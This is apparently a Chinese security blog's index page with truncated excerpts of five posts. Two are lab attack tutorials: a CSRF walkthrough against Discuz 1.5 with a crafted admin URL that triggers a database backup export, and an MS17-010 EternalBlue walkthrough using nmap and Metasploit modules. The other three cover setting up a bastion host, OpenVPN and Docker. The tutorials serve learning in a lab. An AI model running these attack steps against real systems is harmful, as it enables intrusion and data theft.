Anian'Blog

一. CSRF漏洞简介01.CSRF漏洞形成原因开发源码时候，未对相关页面进行token和referer判断，hacker可以构造自己的url地址欺骗用户进行点击。 02.CSRF漏洞攻击分类🔴站内攻击 🔵站外攻击 03.CSRF检测方法☕Burp 抓包检测 ☕SRFTester检查工具 04.如何挖掘CSRF漏洞⚙漏洞扫描工具 📑修改密码的相关页面 📑添加用户的相关页面 📊数据库备份的相关页面 💳数据交易，支付 🎤一些对话框交互页面 二.CSRF防御手段 检验http referer头字段 添加token值 白名单 三. CSRF漏洞复现 靶机:win2003 中间件:Apache/2.4.23 Web:Discuz/1.5 攻击机：win10 Burp 01.注册测试账号论坛注册一个账号，需要有发帖的权限。 02.构造攻击url1http://10.0.0.121:90/DZ/upload/uc_server/admin.php?m=db&a=operate&t=export&appid=0&backupd ...

一、测试环境01 系统环境⚙️win7靶机(未补丁)⚙️kali攻击机 02 复现漏洞🔍ms17-010永恒之蓝 03 明确目标💡win7靶机的IP地址 💡kal攻击机的IP地址 二、开始操作01 nmap网段扫描nmap -v -p139,445 192.168.13.0/24 🔍开始扫描 哈哈哈，有77个主机存活并且开着端口。 02 漏洞利用开启Metasploit 搜索一下ms17-010漏洞利用方法msf6 > search ms17-010 🔍我们使用auxiliary/scanner/smb/smb_ms17_010模块对靶机扫描 use auxiliary/scanner/smb/smb_ms17_010 options set rhost 192.168.13.44 run 扫描完毕，可以看到靶机有这个漏洞可以利用 🔍切换到exploit/windows/smb/ms17_010_eternalblue模块进行攻击 use exploit/windows/smb/ms17_010_eternalblue options show payloads ...

堡垒机可以对外防御攻击者通过管理人员通道攻击渗透服务器，对内可以记录管理运维人员操作记录，便于服务器出故障时候排查问题。 堡垒机选型 12345| 堡垒机 | 说明 ||----|----|| 开源堡垒机 | teleport,jumpserver | | 云产品 | 云厂购买(阿里云,腾讯云) || 硬件产品 | 绿盟，奇安信，360…… | 测试环境 1234|环境|主机名|IP地址||----|----|----||堡垒机|teleport-vpn|221.218.214.200||服务器|web-docker|221.218.214.124| 部署堡垒机 下载teleport软件包 下载 - Teleport，高效易用的堡垒机 (tp4a.com) 上传到web-docker服务器 解压tar xf teleport-server-linux 进入解压后的目录`cd teteleport-server-linux 运行安装命令sh setup.sh 选择teleport安装路径installation path [/usr/local/teleport ...

堡垒机相当于集群的大门，当攻击者无法从管理人员通道直接攻击到集群时候，可以把目标指向堡垒机。当堡垒机权限过去强大时，也意味着网络安全隐患随时触发。 堡垒机这个大门很重要，那我们就通过VPN加密隧道屏蔽攻击者的访问的可能。 环境准备主要通过VPN访问到内网环境，使外网无法访问的的原理进行安全防御，所以要配置内网环境的网卡 创建内网网卡eth1编辑网卡vim /etc/sysconfig/network-scripts/ifcfg-eth11234567TYPE=EthernetBOOTPROTO=noneIPADDR=172.16.1.61PREFIX=24NAME=eth1DEVICE=eth1ONBOOT=yes 重启网络systemctl restart network 检查ip是否生效ip a VPN环境搭建123软件包：openVPN服务端：堡垒机客户端：win10 服务端:1 安装openvpnyum install openvpn easy-rsa -y2.检查是否完成安装rpm -qa openvpn3.1创建ca证书vars文件:创建目录mkdir -p ...

安装CentOS 安装docker engine 清华yum源 安装docker engine 启动docker systemctl enable --now docker 检查 docker version docker镜像加速阿里云获取个人加速地址 docker运行nginx服务 1234567docker run-d 后台运行-p 端口映射-e 传参-v 挂载--name 指定名称--restart==always docker启动后容器启动 查看镜像docker images本地有就启动本地镜像，没有就从远程仓库下载 最新版nginxdocker run -d -p 80:80 nginx:latest 指定版本docker run -d -p 80:80 nginx:1.24 查看容器docker ps 运行中的容器docker ps -a 可以看到出错或未运行的容器 数据包转发：echo 'net.ipv4.ip_forward = 1' >>/etc/sysctl.conf sysct ...